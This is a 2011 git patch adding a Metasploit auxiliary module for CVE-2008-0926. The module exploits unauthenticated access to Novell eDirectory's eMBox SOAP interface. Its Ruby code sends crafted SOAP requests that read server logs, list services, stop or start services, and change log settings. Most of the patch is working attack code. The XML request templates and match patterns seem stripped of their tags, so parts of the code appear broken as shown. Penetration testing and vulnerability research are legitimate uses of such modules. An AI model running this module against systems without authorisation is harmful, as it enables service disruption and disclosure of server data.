From bb2ea62de8baea05ecc309b57a489ea0c446fe85 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 15 Dec 2011 23:09:26 -0600 Subject: [PATCH] Add CVE-2008-0926: Novell eDirectory eMBox Unauthenticated Access (Feature #2729) --- .../admin/edirectory/edirectory_edirutil.rb | 156 ++++++++++++++++++ 1 file changed, 156 insertions(+) create mode 100644 modules/auxiliary/admin/edirectory/edirectory_edirutil.rb diff --git a/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb new file mode 100644 index 0000000000..5ecec93a2c --- /dev/null +++ b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb @@ -0,0 +1,156 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Novell eDirectory eMBox Unauthenticated File Access', + 'Description' => %q{ + This module will access Novell eDirectory's eMBox service and can run the + following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES, + STOP_SERVICE, START_SERVICE, SET_LOGFILE. + }, + 'References' => + [ + [ 'CVE', '2008-0926' ], + [ 'BID', '28441' ], + [ 'OSVDB', '43690' ] + ], + 'Author' => + [ + 'Nicob', + 'MC', #Initial Metasploit module + 'sinn3r' + ], + 'License' => MSF_LICENSE, + 'Actions' => + [ + [ + 'GET_DN', + { + 'Description' => 'Get DN', + 'CMD' => 'novell.embox.connmgr.serverinfo', + 'PATTERN' => /(.*)<\/ServerDN>/, + 'USE_PARAM' => false + } + ], + [ + 'READ_LOGS', + { + 'Description' => 'Read all the log files', + 'CMD' => 'logger.readlog', + 'PATTERN' => /(.*)<\/LogFileData>/, + 'USE_PARAM' => false + } + ], + [ + 'LIST_SERVICES', + { + 'Description' => 'List services', + 'CMD' => 'novell.embox.service.getServiceList', + 'PATTERN' => /(.*)<\/DSService:Message>/, + 'USE_PARAM' => false + } + ], + [ + 'STOP_SERVICE', + { + 'Description' => 'Stop a service', + 'CMD' => 'novell.embox.service.stopService', + 'PATTERN' => /(.*)<\/DSService:Message>/, + 'PARAM' => ''+ + '__PARAM__'+ + '', + 'USE_PARAM' => true + } + ], + [ + 'START_SERVICE', + { + 'Description' => 'Start a service', + 'CMD' => 'novell.embox.service.startService', + 'PATTERN' => /(.*)<\/DSService:Message>/, + 'PARAM' => '' + + '' + + '__PARAM__'+ + '', + 'USE_PARAM' => true + } + ], + [ + 'SET_LOGFILE', + { + 'Description' => 'Read Log File', + 'CMD' => 'logger.setloginfo', + 'PATTERN' => /(.*)<\/Logger:Message>/, + 'PARAM' => '__PARAM__'+ + '', + 'USE_PARAM' => true + } + ] + ], + 'DefaultAction' => 'LIST_SERVICES' + )) + + register_options( + [ + Opt::RPORT(8028), + OptString.new("PARAM", [false, 'Specify a parameter for the action']) + ], self.class) + end + + def run + + if action.opts['USE_PARAM'] + if datastore['PARAM'].nil? or datastore['PARAM'].empty? + print_error("You must supply a parameter for action: #{action.name}") + return + else + param = action.opts['PARAM'].gsub(/__PARAM__/, datastore['PARAM']) + end + else + param = '' + end + + template = %Q| + + + + + #{action.opts['CMD']} + #{param} + + | + + template = template.gsub(/^\t\t/, '') + template = template.gsub(/\n/, '') + + connect + print_status("Sending command: #{action.name}...") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => '/SOAP', + 'data' => template + "\n\n", + 'headers' => + { + 'Content-Type' => 'text/xml', + 'SOAPAction' => "\"" + Rex::Text.rand_text_alpha_upper(rand(25) + 1) + "\"", + } + }, 25) + + raw_data = res.body.scan(/#{action.opts['PATTERN']}/).flatten[0] + print_line("\n" + Rex::Text.decode_base64(raw_data)) + + disconnect + end +end \ No newline at end of file